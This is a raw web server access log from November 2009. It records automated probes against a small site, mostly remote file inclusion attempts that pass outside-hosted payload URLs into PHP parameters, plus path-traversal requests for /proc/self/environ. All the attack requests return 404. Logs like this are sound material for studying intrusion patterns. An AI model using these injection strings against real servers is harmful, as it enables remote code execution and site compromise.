193.200.255.18 - - [29/Nov/2009:16:00:43 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.whinercentral.com/modules/Neos_Chronos/modules/admin/mawar.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.200.255.18 - - [29/Nov/2009:16:00:43 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.whinercentral.com/modules/Neos_Chronos/modules/admin/mawar.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.200.255.18 - - [29/Nov/2009:16:00:43 -0800] "GET /logs/access_090810.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.whinercentral.com/modules/Neos_Chronos/modules/admin/mawar.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.200.255.18 - - [29/Nov/2009:16:01:11 -0800] "GET /logs/access_090525.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.whinercentral.com/modules/Neos_Chronos/modules/admin/mawar.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.50.85.59 - - [29/Nov/2009:16:03:58 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://doroszewicz-clausen.com/contenido/includes/data/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.50.85.59 - - [29/Nov/2009:16:03:58 -0800] "GET /include/admin.lib.inc.php?site_path=http://doroszewicz-clausen.com/contenido/includes/data/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.50.85.59 - - [29/Nov/2009:16:03:58 -0800] "GET /logs/access_090511.log%20%20//include/admin.lib.inc.php?site_path=http://doroszewicz-clausen.com/contenido/includes/data/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.50.85.59 - - [29/Nov/2009:16:03:58 -0800] "GET /logs/access_090511.log%20%20//include/admin.lib.inc.php?site_path=http://doroszewicz-clausen.com/contenido/includes/data/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.50.85.59 - - [29/Nov/2009:16:03:58 -0800] "GET /include/admin.lib.inc.php?site_path=http://doroszewicz-clausen.com/contenido/includes/data/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.50.85.59 - - [29/Nov/2009:16:03:58 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://doroszewicz-clausen.com/contenido/includes/data/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.50.85.59 - - [29/Nov/2009:16:04:52 -0800] "GET /logs/access_090629.log%20%20//include/admin.lib.inc.php?site_path=http://doroszewicz-clausen.com/contenido/includes/data/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.50.85.59 - - [29/Nov/2009:16:05:15 -0800] "GET /logs/access_090629.log%20%20//include/admin.lib.inc.php?site_path=http://doroszewicz-clausen.com/contenido/includes/data/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.50.85.59 - - [29/Nov/2009:16:05:17 -0800] "GET /logs/access_090629.log%20%20//include/admin.lib.inc.php?site_path=http://doroszewicz-clausen.com/contenido/includes/data/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.234.200.133 - - [29/Nov/2009:16:05:19 -0800] "GET /index.php?cmd&file=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "www.galf.org"
200.234.200.133 - - [29/Nov/2009:16:05:19 -0800] "GET /logs//index.php?cmd&file=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "www.galf.org"
200.234.200.133 - - [29/Nov/2009:16:05:20 -0800] "GET /logs//index.php?cmd&file=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "www.galf.org"
200.234.200.133 - - [29/Nov/2009:16:05:20 -0800] "GET /index.php?cmd&file=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "www.galf.org"
121.101.214.54 - - [29/Nov/2009:16:05:23 -0800] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://www.detroitbargainhomes.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [29/Nov/2009:16:05:23 -0800] "GET /includes/ktedit/toolbar.php?dirDepth=http://www.detroitbargainhomes.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.131.226.52 - - [29/Nov/2009:16:05:37 -0800] "GET /logs/access_090824.log%20%20//skin/happycast_category_lightblack/login.php?dir=http://vega.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.195.115.152 - - [29/Nov/2009:16:06:36 -0800] "GET /labia/?D=A HTTP/1.0" 200 508 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
193.200.255.18 - - [29/Nov/2009:16:06:40 -0800] "GET /logs//include/mail.inc.php?skin_board_path=http://www.whinercentral.com/modules/Neos_Chronos/modules/admin/mawar.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.200.255.18 - - [29/Nov/2009:16:06:40 -0800] "GET /include/mail.inc.php?skin_board_path=http://www.whinercentral.com/modules/Neos_Chronos/modules/admin/mawar.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.200.255.18 - - [29/Nov/2009:16:06:40 -0800] "GET /logs/access_090511.log%20%20//include/mail.inc.php?skin_board_path=http://www.whinercentral.com/modules/Neos_Chronos/modules/admin/mawar.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.200.255.18 - - [29/Nov/2009:16:06:43 -0800] "GET /logs/access_090518.log%20%20//include/mail.inc.php?skin_board_path=http://www.whinercentral.com/modules/Neos_Chronos/modules/admin/mawar.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.139.66.104 - - [29/Nov/2009:16:09:22 -0800] "GET /logs/access.log%20%20/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://ioct.cbnu.ac.kr//bbs/skin/zero_vote/10.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
87.139.66.104 - - [29/Nov/2009:16:09:22 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://ioct.cbnu.ac.kr//bbs/skin/zero_vote/10.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
87.139.66.104 - - [29/Nov/2009:16:09:22 -0800] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://ioct.cbnu.ac.kr//bbs/skin/zero_vote/10.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
87.139.66.104 - - [29/Nov/2009:16:09:24 -0800] "GET /logs/access.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://ioct.cbnu.ac.kr//bbs/skin/zero_vote/10.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
87.139.66.104 - - [29/Nov/2009:16:09:24 -0800] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://ioct.cbnu.ac.kr//bbs/skin/zero_vote/10.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
87.139.66.104 - - [29/Nov/2009:16:09:24 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://ioct.cbnu.ac.kr//bbs/skin/zero_vote/10.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
74.50.85.59 - - [29/Nov/2009:16:09:41 -0800] "GET /logs/access_090511.log//include/admin.lib.inc.php?site_path=http://doroszewicz-clausen.com/contenido/includes/data/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.50.85.59 - - [29/Nov/2009:16:10:08 -0800] "GET /logs/access_090629.log//include/admin.lib.inc.php?site_path=http://doroszewicz-clausen.com/contenido/includes/data/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.40.97.102 - - [29/Nov/2009:16:10:45 -0800] "GET /logs/access_090525.log%20%20//include/write.php?dir=http://www.shamrock-maastricht.nl/images/id.jpeg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.40.97.102 - - [29/Nov/2009:16:10:45 -0800] "GET /logs/access_091026.log%20%20//include/write.php?dir=http://www.shamrock-maastricht.nl/images/id.jpeg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.40.97.102 - - [29/Nov/2009:16:10:45 -0800] "GET /include/write.php?dir=http://www.shamrock-maastricht.nl/images/id.jpeg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.40.97.102 - - [29/Nov/2009:16:10:45 -0800] "GET /logs//include/write.php?dir=http://www.shamrock-maastricht.nl/images/id.jpeg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.234.200.133 - - [29/Nov/2009:16:11:11 -0800] "GET /logs/access_090817.log//index.php?cmd&file=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "www.galf.org"
200.234.200.133 - - [29/Nov/2009:16:11:11 -0800] "GET /logs/access_090817.log//index.php?cmd&file=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "www.galf.org"
74.50.85.59 - - [29/Nov/2009:16:11:53 -0800] "GET /logs/access_090511.log//include/admin.lib.inc.php?site_path=http://doroszewicz-clausen.com/contenido/includes/data/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.50.85.59 - - [29/Nov/2009:16:11:54 -0800] "GET /logs/access_090511.log//include/admin.lib.inc.php?site_path=http://doroszewicz-clausen.com/contenido/includes/data/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.50.85.59 - - [29/Nov/2009:16:12:40 -0800] "GET /logs/access_090629.log//include/admin.lib.inc.php?site_path=http://doroszewicz-clausen.com/contenido/includes/data/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.50.85.59 - - [29/Nov/2009:16:12:42 -0800] "GET /logs/access_090629.log//include/admin.lib.inc.php?site_path=http://doroszewicz-clausen.com/contenido/includes/data/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.50.85.59 - - [29/Nov/2009:16:13:20 -0800] "GET /logs/access_090504.log//include/admin.lib.inc.php?site_path=http://doroszewicz-clausen.com/contenido/includes/data/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.50.85.59 - - [29/Nov/2009:16:14:06 -0800] "GET /logs/access_090622.log//include/admin.lib.inc.php?site_path=http://doroszewicz-clausen.com/contenido/includes/data/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.234.200.133 - - [29/Nov/2009:16:14:16 -0800] "GET /logs/access_090622.log//index.php?cmd&file=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "www.galf.org"
200.234.200.133 - - [29/Nov/2009:16:14:17 -0800] "GET /logs/access_090622.log//index.php?cmd&file=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "www.galf.org"
212.40.97.102 - - [29/Nov/2009:16:14:31 -0800] "GET /logs/access.log//include/write.php?dir=http://www.shamrock-maastricht.nl/images/id.jpeg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [29/Nov/2009:16:14:48 -0800] "GET /logs/access_090713.log/includes/ktedit/toolbar.php?dirDepth=http://www.detroitbargainhomes.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.30.48.8 - - [29/Nov/2009:16:15:42 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.prestigemarketinggroup.net/mambots/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.30.48.8 - - [29/Nov/2009:16:15:42 -0800] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.prestigemarketinggroup.net/mambots/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.30.48.8 - - [29/Nov/2009:16:15:42 -0800] "GET /logs/access.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.prestigemarketinggroup.net/mambots/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.30.48.8 - - [29/Nov/2009:16:15:49 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.prestigemarketinggroup.net/mambots/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.30.48.8 - - [29/Nov/2009:16:15:49 -0800] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.prestigemarketinggroup.net/mambots/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.30.48.8 - - [29/Nov/2009:16:15:49 -0800] "GET /logs/access.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.prestigemarketinggroup.net/mambots/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.40.97.102 - - [29/Nov/2009:16:15:51 -0800] "GET /logs/access_090525.log//include/write.php?dir=http://www.shamrock-maastricht.nl/images/id.jpeg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.234.200.157 - - [29/Nov/2009:16:15:59 -0800] "GET /logs/access_090803.log//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "www.galf.org"
200.234.200.157 - - [29/Nov/2009:16:15:59 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "www.galf.org"
200.234.200.157 - - [29/Nov/2009:16:15:59 -0800] "GET /logs/access_090803.log//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "www.galf.org"
200.234.200.157 - - [29/Nov/2009:16:15:59 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "www.galf.org"
74.50.85.59 - - [29/Nov/2009:16:16:39 -0800] "GET /logs/access_090504.log//include/admin.lib.inc.php?site_path=http://doroszewicz-clausen.com/contenido/includes/data/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.50.85.59 - - [29/Nov/2009:16:16:52 -0800] "GET /logs/access_090504.log//include/admin.lib.inc.php?site_path=http://doroszewicz-clausen.com/contenido/includes/data/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.50.85.59 - - [29/Nov/2009:16:17:35 -0800] "GET /logs/access_090622.log//include/admin.lib.inc.php?site_path=http://doroszewicz-clausen.com/contenido/includes/data/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.50.85.59 - - [29/Nov/2009:16:17:52 -0800] "GET /logs/access_090622.log//include/admin.lib.inc.php?site_path=http://doroszewicz-clausen.com/contenido/includes/data/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.201.82.173 - - [29/Nov/2009:16:18:02 -0800] "GET /en/cpmHelp/index.php?type=http://www.qatarsteel.com.qa/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.201.82.173 - - [29/Nov/2009:16:18:02 -0800] "GET /logs/access_090608.log//en/cpmHelp/index.php?type=http://www.qatarsteel.com.qa/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.201.82.173 - - [29/Nov/2009:16:18:02 -0800] "GET /logs//en/cpmHelp/index.php?type=http://www.qatarsteel.com.qa/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.201.82.173 - - [29/Nov/2009:16:18:06 -0800] "GET /en/cpmHelp/index.php?type=http://www.qatarsteel.com.qa/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.201.82.173 - - [29/Nov/2009:16:18:06 -0800] "GET /logs/access_090608.log//en/cpmHelp/index.php?type=http://www.qatarsteel.com.qa/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.201.82.173 - - [29/Nov/2009:16:18:06 -0800] "GET /logs//en/cpmHelp/index.php?type=http://www.qatarsteel.com.qa/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.217.242.210 - - [29/Nov/2009:16:18:19 -0800] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.217.242.210 - - [29/Nov/2009:16:18:19 -0800] "GET /logs/access_090706.log%20%20//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.70.35.48 - - [29/Nov/2009:16:19:13 -0800] "GET /logs//include/write.php?dir=http://www.shamrock-maastricht.nl/images/id.jpeg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.70.35.48 - - [29/Nov/2009:16:19:13 -0800] "GET /logs/access_090525.log%20%20//include/write.php?dir=http://www.shamrock-maastricht.nl/images/id.jpeg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.70.35.48 - - [29/Nov/2009:16:19:13 -0800] "GET /include/write.php?dir=http://www.shamrock-maastricht.nl/images/id.jpeg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.70.35.48 - - [29/Nov/2009:16:19:13 -0800] "GET /logs/access_091026.log%20%20//include/write.php?dir=http://www.shamrock-maastricht.nl/images/id.jpeg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.30.48.8 - - [29/Nov/2009:16:19:28 -0800] "GET /logs/access.log%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.prestigemarketinggroup.net/mambots/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.30.48.8 - - [29/Nov/2009:16:19:38 -0800] "GET /logs/access.log%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.prestigemarketinggroup.net/mambots/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [29/Nov/2009:16:19:39 -0800] "GET /logs/access_090622.log/includes/ktedit/toolbar.php?dirDepth=http://www.detroitbargainhomes.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.181.94.214 - - [29/Nov/2009:16:23:12 -0800] "GET / HTTP/1.1" 200 1048 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "www.galf.org"
220.181.94.214 - - [29/Nov/2009:16:23:22 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "-" "www.galf.org"
124.217.242.210 - - [29/Nov/2009:16:27:19 -0800] "GET /logs/access.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
124.217.242.210 - - [29/Nov/2009:16:27:19 -0800] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
124.217.242.210 - - [29/Nov/2009:16:27:19 -0800] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
195.70.35.48 - - [29/Nov/2009:16:27:30 -0800] "GET /logs/access.log//include/write.php?dir=http://www.shamrock-maastricht.nl/images/id.jpeg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.217.76.244 - - [29/Nov/2009:16:29:06 -0800] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://chandra35.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
209.217.76.244 - - [29/Nov/2009:16:29:06 -0800] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://chandra35.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
209.217.76.244 - - [29/Nov/2009:16:29:06 -0800] "GET /logs/access.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://chandra35.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
195.70.35.48 - - [29/Nov/2009:16:29:16 -0800] "GET /logs/access_090525.log//include/write.php?dir=http://www.shamrock-maastricht.nl/images/id.jpeg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.114.220.160 - - [29/Nov/2009:16:29:24 -0800] "GET /logs/access_090518.log/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://kb27.co.kr/bbs///data/rfi.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
210.114.220.160 - - [29/Nov/2009:16:29:24 -0800] "GET /logs/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://kb27.co.kr/bbs///data/rfi.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
210.114.220.160 - - [29/Nov/2009:16:29:24 -0800] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://kb27.co.kr/bbs///data/rfi.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
210.114.220.160 - - [29/Nov/2009:16:29:27 -0800] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://kb27.co.kr/bbs///data/rfi.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
210.114.220.160 - - [29/Nov/2009:16:29:27 -0800] "GET /logs/access_090518.log/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://kb27.co.kr/bbs///data/rfi.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
210.114.220.160 - - [29/Nov/2009:16:29:27 -0800] "GET /logs/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://kb27.co.kr/bbs///data/rfi.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
77.221.130.13 - - [29/Nov/2009:16:29:34 -0800] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://ioct.cbnu.ac.kr//bbs/skin/zero_vote/10.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
77.221.130.13 - - [29/Nov/2009:16:29:34 -0800] "GET /logs/access.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://ioct.cbnu.ac.kr//bbs/skin/zero_vote/10.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
209.217.76.244 - - [29/Nov/2009:16:29:50 -0800] "GET /logs/access_090601.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://chandra35.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.217.76.244 - - [29/Nov/2009:16:29:50 -0800] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://chandra35.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.217.76.244 - - [29/Nov/2009:16:29:50 -0800] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://chandra35.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.217.76.244 - - [29/Nov/2009:16:30:21 -0800] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://chandra35.fileave.com/bobrok1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
77.221.130.13 - - [29/Nov/2009:16:31:05 -0800] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://ioct.cbnu.ac.kr//bbs/skin/zero_vote/10.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.13 - - [29/Nov/2009:16:31:06 -0800] "GET /logs/access_090601.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://ioct.cbnu.ac.kr//bbs/skin/zero_vote/10.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.13 - - [29/Nov/2009:16:31:06 -0800] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://ioct.cbnu.ac.kr//bbs/skin/zero_vote/10.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.217.76.244 - - [29/Nov/2009:16:31:17 -0800] "GET /logs/access_090601.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://chandra35.fileave.com/bobrok1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.217.76.244 - - [29/Nov/2009:16:31:17 -0800] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://chandra35.fileave.com/bobrok1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.217.76.244 - - [29/Nov/2009:16:31:17 -0800] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://chandra35.fileave.com/bobrok1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
